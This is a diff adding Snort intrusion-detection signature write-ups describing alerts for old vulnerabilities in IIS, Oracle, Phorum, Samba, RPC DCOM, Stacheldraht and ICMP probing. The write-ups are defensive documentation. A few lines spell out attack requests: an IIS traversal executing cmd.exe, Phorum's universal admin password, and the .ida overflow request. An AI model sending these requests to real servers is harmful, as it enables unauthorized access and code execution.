+GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link. 
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0084
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1093.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1093
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2729.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2729
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_varchar2
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2248.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+2248
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Persits AspUpload application.
+
+--
+Impact:
+Information disclosure. Possible retrieval of sensitive system files. 
+Installation of arbitrary files.
+
+--
+Detailed Information:
+Under certain circumstances it is possible to retrieve information from 
+outside the web root of a server using AspUpload by utilizing a 
+directory traversal technique. The same technique can also be used to 
+upload files of the attackers choosing to other areas of the file 
+system.
+
+The vulnerability exists in the sample scripts that accompany the 
+application.
+
+--
+Affected Systems:
+	AspUpload 2.1
+	
+--
+Attack Scenarios:
+The attacker can use a simple directory traversal technique when 
+supplying the filename for upload.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Remove the sample scripts installed by the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3608
+
+--
--- /dev/null
+++ b/doc/signatures/1137.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+1137
+
+--
+Summary:
+This event is generated when an attempt is made to access the php 
+application Phorum using a default administrator account.
+
+--
+Impact:
+Severe - Phorum administration is controlled by the attacker
+
+--
+Detailed Information:
+Phorum is a popular PHP forum and versions 3.0.7 and previous are 
+vulnerable to this exploit.  An attacker can exploit a bug in Phorum's 
+auth.php script to gain administration access using a universal password
+(boogieman) supplied with the variable PHP_AUTH_USER. Phorum's PHP 
+scripts rely on auth.php to authenticate the user.
+
+--
+Attack Scenarios:
+The attacker requests /admin.php?PHP_AUTH_USER=boogieman from the Phorum
+PHP scripts. It is now possible to use the administration script to 
+modify all Phorum settings.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Update Phorum from www.phorum.org
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1741.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1741
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2376.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2376
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Checkpoint VPN-1.
+
+--
+Impact:
+Unauthorized administrative access to Checkpoint VPN-1 systems
+
+--
+Detailed Information:
+Checkpoint VPN-1, SecuRemote and SecureClient contain an error that
+affects the processing of large Certificate requests to the VPN service.
+By sending a large amount of data in the Certificate Request payload an
+attacker may cause a buffer overflow condition to occur, presenting an
+opportunity to execute code of their choosing with the privileges of the
+user running the service, usually root.
+
+--
+Affected Systems:
+	CheckPoint Software FW-1 1.4.1 Service packs prior to SP6
+	CheckPoint Software FW-1 Next Generation FP1, FP0
+	CheckPoint Software VPN-1 1.4.1 SP5a
+	CheckPoint Software VPN-1 Next Generation FP1, FP0
+
+--
+Attack Scenarios:
+An attacker could supply a large Certificate Request payload containing
+code to be executed on the system.
+
+--
+Ease of Attack:
+Proof of concept code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/418.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+
+Sid:
+418
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Information Request datagram with an undefined ICMP code.
+
+--
+
+Impact:
+ICMP Information Request datagrams attempt to locate the network number of the network segment the datagram was generated on.  This could be an indication of an improperly configured host attempting to locate the network number of the subnet it is located in.
+
+Undefined ICMP Code values should never be seen on the network.  This could be an indication of nefarious activity on the network.
+
+--
+
+Detailed Information:
+This message is generated when a host attempts to locate the network number of the network segment it is located on..  Hosts that generated ICMP Information Request Messages are attempting to obtain the network number of subnet it is on.  In normal situations the ICMP Code should be set to 0, values other than 0 are undefined and should never be used.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 15 datagrams are not normal network activity.  Hosts generating ICMP Information Request messages or Information Reply Messages should be checked for configuration errors.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/566.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+566
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+application or service that may violate a corporate security policy.
+
+--
+Impact:
+This may be a violation of corporate policy since some applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation. In
+some instances this event may indicate behavior contrary to best
+security practices.
+
+--
+Detailed Information:
+This event may indicate a violation of corporate policy. It may also
+indicate the use of services or applications that may be the antithesis
+of best security practices.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios:
+Violation of corporate security policy can manifest serious risk to
+company assets.
+
+--
+Ease of Attack:
+Not applicable
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure adherence to best security practices and strict adherence to
+corporate policy
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Symantec PC Anywhere Home Page
+http://www.symantec.com/pcanywhere/Consumer/
+
+--
--- /dev/null
+++ b/doc/signatures/2679.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2679
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure ksdwrt
+. This procedure is included in
+sys.dbms_system.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/229.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+229
+
+--
+Summary:
+This event is generated when a Stacheldraht agent attempts to contact a known handler.
+
+--
+Impact:
+This indicates that a Stacheldraht agent may exist on the source host and a handler may exist on the destination host.
+
+--
+Detailed Information:
+The Stacheldraht DDoS uses a tiered structure of compromised hosts to coordinate and participate in a denial of service attack.  
+
+There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.  Once a host becomes a Stacheldraht agent, it will attempt to contact a list of known handlers using an ICMP echo reply with an ICMP identification number of 666 and a string of "skillz" in the payload. 
+
+--
+Affected Systems:
+Any Stacheldraht compromised host.
+
+--
+Attack Scenarios:
+A compromised host that has become a Stacheldraht agent will attempt an initial communication with all known handlers.
+
+--
+Ease of Attack:
+Simple. Stacheldraht code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS190
+
+--
--- /dev/null
+++ b/doc/signatures/3030.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3030
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3245.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3245
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1456.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1456
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1999.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1999
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1187.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1187
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2751.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2751
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_priority_group
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/387.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+387
+
+--
+Summary:
+This event is generated when an internal server replies to an external request for network subnet mask information, which may allow an attacker to learn information about the network for use in later attacks. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+If an attacker sends an ICMP request to an internal server for address mask information (SID 389 should trigger when this activity is seen), an internal server may reply with subnet mask information.  This can provide an attacker with information about subnet mask configuration that can be useful for future attacks.
+
+--
+Affected Systems:
+Any system that responds to ICMP address mask requests.
+
+--
+Attack Scenarios:
+An attacker can send an ICMP request for subnet mask information to the internal network. The server replies, providing the attacker with information about network subnet configuration.
+
+--
+Ease of Attack:
+Simple. Tools that use this method of information gathering are freely available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a packet filtering firewall that restricts ICMP type 17 (address mask requests) from entering the protected network, and restricts ICMP type 18 packets (address mask replies) from exiting the protected network.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski <matt.watchinski@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0524
+
+ArachNIDS
+http://www.whitehats.com/cgi/arachNIDS/Show?_id=ids216
+
+--
--- /dev/null
+++ b/doc/signatures/1243.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1243
+
+--
+Summary:
+This event is generated when an attempt is made to access the .ida Indexing Service ISAPI filter. 
+
+--
+Impact:
+Remote access.  This attack may allow execution of arbitrary commands in System context providing complete control of the server. 
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) installs several Internet Service Application Programming Interface (ISAPI) extensions.  A buffer overflow vulnerability exists because of improper buffer checking in the .ida ISAPI filter.  This may allow execution of arbitrary commands with System level access on the vulnerable server.  The Code Rode worm used this vulnerability to propagate.
+
+--
+Affected Systems:
+Windows NT 4.0 IIS 4.0
+Windows 2000 IIS 5.0
+Windows XP beta IIS 6.0 beta
+
+--
+Attack Scenarios:
+An attacker can craft a special HTTP request that can cause a buffer overflow.  
+
+--
+Ease of Attack:
+Simple. Send the following request to a vulnerable server:
+GET /a.ida?NNNN... HTTP/1.0 where 240 N's or other characters are supplied. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+
+Consider removing the .ida ISAPI filter if it is not necessary.
+ 
+Download and install the appropriate patch mentioned in the Microsoft bulletin.
+
+--
+Contributors:
+Original rule written by  Dr SuSE and C. Mayor. 
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS552
+
+CERT
+http://www.cert.org/incident_notes/IN-2001-08.html
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms01-033.asp
+
+eEye Digital Security
+http://www.eeye.com/html/Research/Advisories/AD20010618.html
+
+
+--
--- /dev/null
+++ b/doc/signatures/2687.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2687
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure validate
+. This procedure is included in
+sys.dbms_internal_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1735.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1735
+
+--
+Summary:
+This event is generated when a client on the protected network has 
+possibly visited a website containing a malicious link leading to
+disclosure of information on the client.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+Certain versions of Mozilla, Netscape and other browsers based on these
+may allow a malicious link to reveal information about the files and
+filesystem on a host.
+
+HTTP redirects are mishandled by the XMLHttpRequest object in some
+browsers, this may allow a malicious web server to retrieve information
+from the client host if the redirect points to a local file.
+
+--
+Affected Systems:
+	Eazel Nautilus 1.0.4
+	Galeon 1.2 and 1.2.1
+	Mozilla versions 0.9.7 to 1.0 RC1
+	Netscape versions 6.1 to 6.2.2
+
+--
+Attack Scenarios:
+A devious website admin creates a webpage with malicious code and 
+obtains sensitive information from a visiting user's web browser about 
+any file or filesystem on the host he wishes.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives: 
+None known
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com> 
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4628
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0354
+
+--
--- /dev/null
+++ b/doc/signatures/408.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+408
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Echo Reply in response to an ICMP Echo Request message.
+
+--
+
+Impact:
+Information-gathering.  An ICMP Echo Reply message is sent in response to an ICMP REcho Request message.  If the ICMP Echo Reply message reaches the requesting host it indicates that the replying host is alive.
+
+--
+
+Detailed Information:
+ICMP Type 0 Code 0 is the RFC defined messaging type for ICMP Echo Reply datagrams.  This type of message is used to determine if a host is active on the network.
+
+--
+
+Attack Scenarios:
+A remote attacker may use ICMP Echo Request datagrams to determine active hosts on the network in prelude of further attacks.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Use ingress filtering to prevent ICMP Type 0 Code 8 messages from entering the network.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2720.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2720
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_column_group_to_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
